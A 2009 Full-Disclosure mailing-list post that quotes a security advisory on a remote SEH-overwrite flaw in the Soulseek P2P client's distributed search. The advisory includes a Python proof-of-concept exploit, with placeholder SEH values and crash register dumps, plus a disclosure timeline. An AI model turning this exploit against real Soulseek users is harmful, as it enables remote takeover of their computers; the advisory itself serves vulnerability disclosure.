Re: Soulseek * P2P Remote Distributed Search Code Execution

[Pete Licoln <pete.licoln () gmail com>]

Oh so you have a blog ...
http://g-laurent.blogspot.com/

2009/5/25 laurent gaffie <laurent.gaffie () gmail com>

> =============================================
> - Release date: May 24th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: critical
> =============================================
>
> I. VULNERABILITY
> -------------------------
> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
>
> II. BACKGROUND
> -------------------------
> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
> sharing application.
> One of the things that makes Soulseek(tm) unique is our community and
> community-related features.
> Based on peer-to-peer technology, virtual rooms allow you to meet people
> with
> the same interests, share information, and chat freely using real-time
> messages
> in public or private.
> Soulseek(tm), with its built-in people matching system, is a great way to
> make
> new friends and expand your mind!"
>
> III. DESCRIPTION
> -------------------------
> Soulseek client allows distributed file search to one person, everyone, or
> in a
> specific Soulseek IRC channel, allowing a user to find the files he wants,
> in
> a dedicated channel, or with his contacts, or on the whole network.
> Unfortunatly this feature is vulnerable to a remote SEH overwrite to a
> specific
> user, or even to a whole Soulseek IRC channel.
>
> IV. PROOF OF CONCEPT
> -------------------------
> This proof of concept is made to prevent a S-K party, it is only build to
> target the user "testt4321".
>
> To try this proof of concept, you would have to open a soulseek client and
> use
> the username:
> "testt4321"
> with the password:
> "12345678"
> And launch this code.
> If you want to change the username or target a whole channel, you would
> have
> to reverse the binary protocol
>
>
>
> #!/usr/bin/python
> import struct
> import sys, socket
> from time import *
>
> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
> s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch
>
> buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
> buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
> buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
> buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
>
> s.send(buffer)
> sleep(1)
>
> junk = "\x41" * 3084
> next_seh = struct.pack('<L', 0x42424242)
> seh =      struct.pack('<L', 0x43434343)
> other_junk = "\x61" * 1423
>
> buffer2 =
> "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
> buffer2+=
> "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
> s.send(buffer2)
> sleep(1)
> s.recv(1024)
>
>
>
> After the query is send, the memory will look like this
> 0012FBE4   41414141
> 0012FBE8   42424242  Pointer to next SEH record
> 0012FBEC   43434343  SE handler
> 0012FBF0   61616161
>
> And the program will terminate with this structure:
> EAX 00000000
> ECX 43434343
> EDX 7C9132BC ntdll.7C9132BC
> EBX 00000000
> ESP 0012EA78
> EBP 0012EA98
> ESI 00000000
> EDI 00000000
> EIP 43434343
>
>
> V. BUSINESS IMPACT
> -------------------------
> An attacker could exploit this vulnerability to compromise any Soulseek
> client connected to
> the Soulseek network.
>
> VI. SYSTEMS AFFECTED
> -------------------------
> Windows all versions running Soulseek *
>
> VII. SOLUTION
> -------------------------
> A fast solution would be to use Nicotine-Plus (
> http://nicotine-plus.sourceforge.net/)
> a Python Soulseek client.
> Another quick workaround (at server level) would be to limit the search
> query lenght.
>
> VIII. REFERENCES
> -------------------------
> http://www.slsknet.org
>
> IX. CREDITS
> -------------------------
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
>
>
> X. REVISION HISTORY
> -------------------------
> May 24, 2009: Initial release
>
>
> XI. DISCLOSURE TIMELINE
> -------------------------
> july      29, 2008: Bug discovered
> September 03, 2008: Vendor contacted; no response.
> October   14, 2008: Vendor contacted; still no response.
> April     12, 2009: Idefense contacted.
> April     13, 2009: Idefense answered.
> April     23, 2009: Advisory send to idefense contributor program.
> May       13, 2009: Idefense contacted, bug rejected (no reason given)
> May       15, 2009: Idefense recontacted; no answer.
> May       16, 2009: Last try to contact Soulseek maintainers
> May       24, 2009: Advisory published.
>
> XII. LEGAL NOTICES
> -------------------------
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/